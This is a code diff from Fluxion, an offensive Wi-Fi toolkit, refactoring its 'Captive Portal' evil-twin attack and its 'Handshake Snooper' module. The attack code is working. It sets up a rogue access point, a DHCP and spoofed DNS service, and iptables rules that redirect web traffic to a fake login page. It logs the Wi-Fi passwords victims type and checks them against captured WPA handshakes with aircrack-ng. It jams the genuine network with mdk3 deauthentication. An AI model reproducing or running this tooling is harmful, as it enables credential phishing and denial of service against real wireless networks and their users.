"$FLUXIONWorkspacePath/captive_portal/connectivity_responses" + + # AP Service: Prepare service for an attack. + if [ "$CaptivePortalAPService" ]; then + ap_service_prep \ + "$CaptivePortalAccessPointInterface" \ + "$CaptivePortalGatewayAddress" \ + "$FluxionTargetSSID" \ + "$FluxionTargetRogueMAC" \ + "$FluxionTargetChannel" + + CaptivePortalAccessInterface=$APServiceAccessInterface + fi + + # Generate the dhcpd configuration file, which is - # used to provide DHCP service to APRogue clients. + # used to provide DHCP service to rogue AP clients. echo "\ authoritative; default-lease-time 600; max-lease-time 7200; -subnet $VIGWNetwork.0 netmask 255.255.255.0 { - option broadcast-address $VIGWNetwork.255; - option routers $VIGWAddress; +subnet $CaptivePortalGatewayNetwork.0 netmask 255.255.255.0 { + option broadcast-address $CaptivePortalGatewayNetwork.255; + option routers $CaptivePortalGatewayAddress; option subnet-mask 255.255.255.0; - option domain-name-servers $VIGWAddress; + option domain-name-servers $CaptivePortalGatewayAddress; - range $VIGWNetwork.100 $VIGWNetwork.254; + range $CaptivePortalGatewayNetwork.100 $CaptivePortalGatewayNetwork.254; }\ " >"$FLUXIONWorkspacePath/dhcpd.conf" @@ -475,7 +621,7 @@ fastcgi.server = ( \".php\" => ( ( \"bin-path\" => \"/usr/bin/php-cgi\", - \"socket\" => \"/php.socket\" + \"socket\" => \"/tmp/fluxspace/php.socket\" ) ) ) @@ -579,7 +725,7 @@ class DNSQuery: return packet if __name__ == '__main__': - ip='$VIGWAddress' + ip='$CaptivePortalGatewayAddress' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -598,16 +744,17 @@ if __name__ == '__main__': chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"} # Attack arbiter script echo "\ #!/bin/bash -function signal_stop_attack() { +signal_stop_attack() { kill -s SIGABRT $$ # Signal STOP ATTACK handle_abort_authenticator } -function handle_abort_authenticator() { +handle_abort_authenticator() { AuthenticatorState=\"aborted\" } @@ -670,25 +817,25 @@ while [ \$AuthenticatorState = \"running\" ]; do if [ -f \"$FLUXIONWorkspacePath/pwdattempt.txt\" -a -s \"$FLUXIONWorkspacePath/pwdattempt.txt\" ]; then # Save any new password attempt. - cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\" + cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\" # Clear logged password attempt. echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\" fi if [ -f \"$FLUXIONWorkspacePath/ip_hits\" -a -s \"$FLUXIONWorkspacePath/ip_hits.txt\" ]; then - cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" - echo \" \" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" + cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" + echo \" \" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" echo -n > \"$FLUXIONWorkspacePath/ip_hits\" fi " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". - if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then + if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | grep -qi \"Passphrase not in\"; then echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" sleep 1 @@ -701,16 +848,16 @@ while [ \$AuthenticatorState = \"running\" ]; do fi" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi - local staticSSID=$(printf "%q" "$APTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") + local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " - DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host)) + DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalGatewayNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" printf \" SSID ...........: $CWht%s$CClr\\n\" \"$staticSSID\" - echo -e \" MAC ............: $CYel$APTargetMAC$CClr\" - echo -e \" Channel ........: $CWht$APTargetChannel$CClr\" - echo -e \" Vendor .........: $CGrn${APTargetMaker:-UNKNOWN}$CClr\" + echo -e \" MAC ............: $CYel$FluxionTargetMAC$CClr\" + echo -e \" Channel ........: $CWht$FluxionTargetChannel$CClr\" + echo -e \" Vendor .........: $CGrn${FluxionTargetMaker:-UNKNOWN}$CClr\" echo -e \" Runtime ........: $CBlu\$ih\$h:\$im\$m:\$is\$s$CClr\" echo -e \" Attempts .......: $CRed\$(cat $FLUXIONWorkspacePath/hit.txt)$CClr\" echo -e \" Clients ........: $CBlu\$(cat $FLUXIONWorkspacePath/clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)$CClr\" @@ -741,7 +888,7 @@ while [ \$AuthenticatorState = \"running\" ]; do echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -763,18 +910,18 @@ echo \" FLUXION $FLUXIONVersion.$FLUXIONRevision SSID: \\\"$staticSSID\\\" -BSSID: $APTargetMAC ($APTargetMaker) -Channel: $APTargetChannel -Security: $APTargetEncryption +BSSID: $FluxionTargetMAC ($FluxionTargetMaker) +Channel: $FluxionTargetChannel +Security: $FluxionTargetEncryption Time: \$ih\$h:\$im\$m:\$is\$s Password: \$(cat $FLUXIONWorkspacePath/candidate.txt) Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand)) IP: $(captive_portal_get_client_IP) -\" >\"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" +\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " -aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log"$CClr"\"\ +aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -782,7 +929,7 @@ aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDCle } # Generate the contents for a generic web interface -function captive_portal_generic() { +captive_portal_generic() { if [ ! -d "$FLUXIONWorkspacePath/captive_portal" ]; then mkdir "$FLUXIONWorkspacePath/captive_portal" fi @@ -876,8 +1023,8 @@ function captive_portal_generic() {

-
$APTargetSSID ($APTargetMAC)
- +
$FluxionTargetSSID ($FluxionTargetMAC)
+

@@ -907,10 +1054,10 @@ function captive_portal_generic() { " >"$FLUXIONWorkspacePath/captive_portal/index.html" } -function captive_portal_unset_routes() { - if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then - iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" &>$FLUXIONOutputDevice - sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules" +captive_portal_unset_routes() { + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore <"$FLUXIONIPTablesBackup" \ + &> $FLUXIONOutputDevice else iptables --flush iptables --table nat --flush @@ -920,19 +1067,21 @@ function captive_portal_unset_routes() { # Restore system's original forwarding state if [ -f "$FLUXIONWorkspacePath/ip_forward" ]; then - sysctl -w net.ipv4.ip_forward=$(cat "$FLUXIONWorkspacePath/ip_forward") &>$FLUXIONOutputDevice + sysctl -w net.ipv4.ip_forward=$( + cat "$FLUXIONWorkspacePath/ip_forward" + ) &> $FLUXIONOutputDevice sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward" fi - ip addr del $VIGWAddress/24 dev $VIGW 2>/dev/null + ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null } # Set up DHCP / WEB server # Set up DHCP / WEB server -function captive_portal_set_routes() { +captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. - ip addr add $VIGWAddress/24 dev $VIGW + ip addr add $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface # Save the system's routing state to restore later. cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward" @@ -940,44 +1089,45 @@ function captive_portal_set_routes() { # Activate system IPV4 packet routing/forwarding. sysctl -w net.ipv4.ip_forward=1 &>$FLUXIONOutputDevice - iptables-save >"$FLUXIONWorkspacePath/iptables-rules" - iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT - iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress:80 - iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress:443 + iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ + --to-destination $CaptivePortalGatewayAddress:80 + iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ + --to-destination $CaptivePortalGatewayAddress:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE } -function captive_portal_stop_interface() { +captive_portal_stop_interface() { captive_portal_unset_routes - if [ "$APRogueService" ]; then ap_stop + if [ "$CaptivePortalAPService" ]; then + ap_service_stop fi } -function captive_portal_start_interface() { - if [ "$APRogueService" ]; then +captive_portal_start_interface() { + if [ "$CaptivePortalAPService" ]; then echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice" - ap_start + ap_service_start else fluxion_header echo -e "$FLUXIONVLine Configuration for external access point device:" echo - fluxion_show_ap_info "$APRogueSSID" "OPEN" "$APTargetChannel" "$APRogueMAC" "$APTargetMaker" + fluxion_target_show - echo -e "$FLUXIONVLine IPv4 Address: ${VIGWAddress%.*}.2/24" + echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalGatewayAddress%.*}.2/24" echo -e "$FLUXIONVLine IPv6 Address: Disabled" - echo -e "$FLUXIONVLine DHCP Server: $VIGWAddress" - echo -e "$FLUXIONVLine DNS Server: $VIGWAddress" + echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalGatewayAddress" + echo -e "$FLUXIONVLine DNS Server: $CaptivePortalGatewayAddress" echo echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}" @@ -988,61 +1138,107 @@ function captive_portal_start_interface() { captive_portal_set_routes & sleep 3 - fuser -n tcp -k 53 67 80 443 &>$FLUXIONOutputDevice - fuser -n udp -k 53 67 80 443 &>$FLUXIONOutputDevice + fuser -n tcp -k 53 67 80 443 &> $FLUXIONOutputDevice + fuser -n udp -k 53 67 80 443 &> $FLUXIONOutputDevice } -function unprep_attack() { - CaptivePortalState="Not Ready" - captive_portal_unset_attack - captive_portal_unset_site - captive_portal_unset_conn - captive_portal_unset_cert - captive_portal_unset_auth - captive_portal_unset_interface -} -function prep_attack() { - while true; do - captive_portal_set_interface - if [ $? -ne 0 ]; then break; fi - captive_portal_set_auth - if [ $? -ne 0 ]; then - captive_portal_unset_interface - continue - fi - captive_portal_set_cert - if [ $? -ne 0 ]; then - captive_portal_unset_auth - continue - fi - captive_portal_set_conn - if [ $? -ne 0 ]; then - captive_portal_unset_cert - continue - fi - captive_portal_set_site - if [ $? -ne 0 ]; then - captive_portal_unset_conn - continue - fi - captive_portal_set_attack - if [ $? -ne 0 ]; then - captive_portal_unset_site - continue - fi - CaptivePortalState="Ready" - break +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$CaptivePortalCLIArguments" ]; then + if ! CaptivePortalCLIArguments=$( + getopt --options="a:j:s:c:u:h:" \ + --longoptions="ap:,jammer:,ssl:,connectivity:,ui:,hash:" \ + --name="Captive Portal V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit + fi + + declare -r CaptivePortalCLIArguments=$CaptivePortalCLIArguments + + eval set -- "$CaptivePortalCLIArguments" # Set environment parameters. +fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -a|--ap) + CaptivePortalUninitializedAccessPointInterface=$2; shift;; + -j|--jammer) + CaptivePortalUninitializedJammerInterface=$2; shift;; + -s|--ssl) + CaptivePortalSSLCertificatePath=$2; shift;; + -c|--connectivity) + CaptivePortalConnectivity=$2; shift;; + -u|--ui) + CaptivePortalUserInterface=$2; shift;; + -h|--hash) + # Assuming hash auth-mode here (the only one available as of now). + # WARNING: If more auth-modes are added, assume hash auth-mode here! + CaptivePortalHashPath=$2; shift;; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" done +} - # Check for prep abortion. - if [ "$CaptivePortalState" != "Ready" ]; then - unprep_attack +attack_tracking_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done + echo "" # This enables the Skip option. +} + +unprep_attack() { + CaptivePortalState="Not Ready" + + captive_portal_unset_attack + captive_portal_unset_user_interface + captive_portal_unset_connectivity + captive_portal_unset_certificate + captive_portal_unset_authenticator + captive_portal_unset_ap_interface + captive_portal_unset_jammer_interface +} + +prep_attack() { + local sequence=( + "set_jammer_interface" + "set_ap_interface" + "set_ap_service" + "set_authenticator" + "set_certificate" + "set_connectivity" + "set_user_interface" + "set_attack" + ) + + if ! fluxion_do_sequence captive_portal sequence[@]; then return 1 fi + + CaptivePortalState="Ready" } -function stop_attack() { +stop_attack() { # Attempt to find PIDs of any running authenticators. local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}') @@ -1050,32 +1246,35 @@ function stop_attack() { if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi if [ "$CaptivePortalJammerServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalJammerServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalJammerServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk3_blacklist.lst" # Kill captive portal web server log viewer. if [ "$CaptivePortalWebServiceXtermPID" ]; then - kill $CaptivePortalWebServiceXtermPID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice CaptivePortalWebServiceXtermPID="" # Clear service PID fi # Kill captive portal web server. if [ "$CaptivePortalWebServicePID" ]; then - kill $CaptivePortalWebServicePID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice CaptivePortalWebServicePID="" # Clear service PID fi # Kill python DNS service if one is found. if [ "$CaptivePortalDNSServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDNSServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDNSServiceXtermPID="" # Clear parent PID fi # Kill DHCP service. if [ "$CaptivePortalDHCPServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDHCPServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt" @@ -1085,7 +1284,7 @@ function stop_attack() { CaptivePortalState="Stopped" } -function start_attack() { +start_attack() { if [ "$CaptivePortalState" = "Running" ]; then return 0; fi if [ "$CaptivePortalState" != "Ready" ]; then return 1; fi CaptivePortalState="Running" @@ -1095,27 +1294,41 @@ function start_attack() { captive_portal_start_interface echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice" - xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" -title "FLUXION AP DHCP Service" -e "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & - CaptivePortalDHCPServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \ + -title "FLUXION AP DHCP Service" -e \ + "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & + # Save parent's pid, to get to child later. + CaptivePortalDHCPServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" -title "FLUXION AP DNS Service" -e "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & - CaptivePortalDNSServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ + -title "FLUXION AP DNS Service" -e \ + "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & + # Save parent's pid, to get to child later. + CaptivePortalDNSServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice" - lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" &>$FLUXIONOutputDevice + lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \ + &> $FLUXIONOutputDevice CaptivePortalWebServicePID=$! - xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" -title "FLUXION Web Service" -e "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & + xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" \ + -title "FLUXION Web Service" -e \ + "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & CaptivePortalWebServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice" - echo -e "$APTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" -title "FLUXION AP Jammer Service [$APTargetSSID]" -e "mdk3 $WIMonitor d -c $APTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & - CaptivePortalJammerServiceXtermPID=$! # Save parent's pid, to get to child later. + echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" - xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & + xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \ + -title "FLUXION AP Authenticator" \ + -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & } diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index 9f50533..fd480a6 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -2,6 +2,12 @@ # identifier: Captive Portal # description: Creates an "evil twin" access point. +CaptivePortalJammerInterfaceQuery="Select an interface for jamming." +CaptivePortalAccessPointInterfaceQuery="Select an interface for the access point." + +CaptivePortalAPServiceQuery="Select an access point service" +CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" +CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalInterfaceQuery="Select an interface for the captive portal." CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 84c39a3..af806da 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -1,12 +1,27 @@ #!/bin/bash -########################### < Handshake Snooper Parameters > ########################### +# ============================================================ # +# ============= < Handshake Snooper Parameters > ============= # +# ============================================================ # HandshakeSnooperState="Not Ready" -################################# < Handshake Snooper > ################################ -function handshake_snooper_arbiter_daemon() { - if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then return 1; fi + +# ============================================================ # +# ========= < Handshake Snooper Helper Subroutines > ========= # +# ============================================================ # +handshake_snooper_header() { + fluxion_header; fluxion_target_show; echo +} + + +# ============================================================ # +# ============= < Handshake Snooper Subroutines > ============ # +# ============================================================ # +handshake_snooper_arbiter_daemon() { + if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then + return 1; + fi # Start daemon in the running state to continue execution until aborted, # or until a hash has been verified to exist in the capture file. @@ -15,13 +30,16 @@ function handshake_snooper_arbiter_daemon() { function handshake_snooper_arbiter_daemon_abort() { handshake_snooper_arbiter_daemon_state="aborted" - if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then kill $handshake_snooper_arbiter_daemon_viewerPID + if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then + kill $handshake_snooper_arbiter_daemon_viewerPID fi handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + local -r now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperArbiterAbortedWarning" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" exit 2 } @@ -34,10 +52,14 @@ function handshake_snooper_arbiter_daemon() { sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*" # Display some feedback to the user to assure verifier is working. - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" \ + -title "Handshake Snooper Arbiter Log" -e \ + "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & local handshake_snooper_arbiter_daemon_viewerPID=$! - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" >"$FLUXIONWorkspacePath/handshake_snooper.log" + local now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStartingArbiterNotice" > \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_start_captor handshake_snooper_start_deauthenticator @@ -46,26 +68,38 @@ function handshake_snooper_arbiter_daemon() { # Keep snooping and verifying until we've got a valid hash from the capture file. while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do - echo -e "[$(env -i date '+%H:%M:%S')] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" sleep $HANDSHAKEVerifierInterval & wait $! # Using wait to asynchronously catch flags while waiting. # If synchronously searching, stop the captor and deauthenticator before checking. if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStoppingForVerifierNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap" + mv "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + "$FLUXIONWorkspacePath/capture/recent.cap" else - pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &>$FLUXIONOutputDevice + pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> \ + $FLUXIONOutputDevice fi - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperSearchingForHashesNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" + hash_check_handshake "$HANDSHAKEVerifierIdentifier" \ + "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$FluxionTargetSSID" "$FluxionTargetMAC" handshake_snooper_arbiter_daemon_verified=$? # If synchronously searching, restart the captor and deauthenticator after checking. - if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then + if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a \ + $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*" handshake_snooper_start_captor @@ -78,34 +112,39 @@ function handshake_snooper_arbiter_daemon() { handshake_snooper_stop_captor local completionTime=$(env -i date '+%H:%M:%S') - echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" # Assure we've got a directory to store hashes into. mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/" # Move handshake to storage if one was acquired. - mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" + mv "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" # Signal parent process the verification terminated. kill -s SIGABRT $1 } -function handshake_snooper_stop_captor() { - if [ "$HANDSHAKECaptorPID" ]; then kill -s SIGINT $HANDSHAKECaptorPID &>$FLUXIONOutputDevice +handshake_snooper_stop_captor() { + if [ "$HANDSHAKECaptorPID" ]; then + kill -s SIGINT 